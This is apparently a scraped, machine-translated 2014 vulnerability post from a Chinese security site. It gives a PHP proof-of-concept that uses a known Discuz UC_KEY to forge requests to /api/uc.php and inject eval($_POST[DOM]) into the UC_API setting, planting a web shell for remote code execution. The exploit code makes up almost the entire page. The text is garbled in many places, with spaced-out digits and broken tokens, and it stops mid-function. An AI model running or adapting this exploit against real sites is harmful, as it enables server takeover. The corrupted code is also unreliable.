Discuz use UC_KEY be getshell-a vulnerability warning-the black bar safety net

2014-01-13T00:00:00
ID MYHACK58:62201441801
Type myhack58
Reporter 佚名
Modified 2014-01-13T00:00:00

Description

From:http://www. tick. org/bugs/tick-2 0 1 4-0 4 8 1 3 7

<? php

// Code copyright belongs to the original author all!

$timestamp = time()+1 0*3 6 0 0;

$host="127.0.0.1";

$uc_key="eapf15K8b334Bc8eBeY4Gfn1VbqeA0N5waofq6j285ca33i151e551g0l9f2l3dd";

$code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key));

$cmd1='<? xml version="1.0" encoding="ISO-8 8 5 9-1"?& gt;

<root>

<item id="UC_API">http://x\');eval($_POST[DOM]);//</item>

</root>';

$cmd2='<? xml version="1.0" encoding="ISO-8 8 5 9-1"?& gt;

<root>

<item id="UC_API">http://x</item>

</root>';

$html1 = send($cmd1);

echo $html1;

$html2 = send($cmd2);

echo $html2;

function send($cmd){

global $host,$code;

$message = "POST /api/uc. php? code=".$ code." HTTP/1.1\r\n";

$message .= "Accept: /\r\n";

$message .= "Referer: ".$ host."\ r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$message .= "Host: ".$ host."\ r\n";

$message .= "Content-Length: ". strlen($cmd)."\ r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $cmd;

//var_dump($message);

$fp = fsockopen($host, 8 0);

fputs($fp, $message);

$resp = ";

while ($fp && ! feof($fp))

$resp .= fread($fp, 1 0 2 4);

return $resp;

}

function _authcode($string, $operation = 'DECODE', $key = ", $expiry = 0) {

$ckey_length = 4;

$key = md5($key ? $key : UC_KEY);

$keya = md5(substr($key, 0, 1 6));

$keyb = md5(substr($key, 1 6, 1 6));

$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ";

$cryptkey = $keya. md5($keya.$ keyc);

$key_length = strlen($cryptkey);

$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0). substr(md5($string.$ keyb), 0, 1 6).$ string;

$string_length = strlen($string);

$result = ";

$box = range(0, 2 5 5);

$rndkey = array();

for($i = 0; $i <= 2 5 5; $i++) {

$rndkey[$i] = ord($cryptkey[$i % $key_length]);

}

for($j = $i = 0; $i < 2 5 6; $i++) {

$j = ($j + $box[$i] + $rndkey[$i]) % 2 5 6;

$tmp = $box[$i];

$box[$i] = $box[$j];

$box[$j] = $tmp;

}

for($a = $j = $i = 0; $i < $string_length; $i++) {

$a = ($a + 1) % 2 5 6;

$j = ($j + $box[$a]) % 2 5 6;

$tmp = $box[$a];

$box[$a] = $box[$j];

$box[$j] = $tmp;

$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 2 5 6]));

}

if($operation == 'DECODE') {

if((substr($result, 0, 1 0) == 0 || substr($result, 0, 1 0) - time() > 0) && substr($result, 1 0, 1 6) == substr(md5(substr($result, 2 6).$ keyb), 0, 1 6)) {

return substr($result, 2 6);

[1] [2] next